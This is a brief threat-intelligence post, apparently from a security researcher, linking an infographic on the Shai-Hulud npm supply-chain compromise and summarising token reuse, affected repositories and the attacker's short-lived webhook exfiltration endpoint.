🔗 Shai-Hulud: Infographic

Some details here that I think have been missed in a lot of coverage:

1. npm tokens leaked in s1ngularity were used by the attacker, but we also suspect GitHub tokens from s1ngularity were upgraded to npm tokens, as well as abuse of npm tokens leaked from early Shai-Hulud victims
2. We still have only validated the initial 36 “Shai-Hulud” repositories (not counting the “Migration” repositories). The vast majority were downstream of ctrl/tinycolor and ngx-bootstrap!
3. webhook[.]site only supports 100 requests on the free plan, and then quickly deactived the attacker’s exfil endpoint. However, secrets would still be visible in GitHub workflow logs!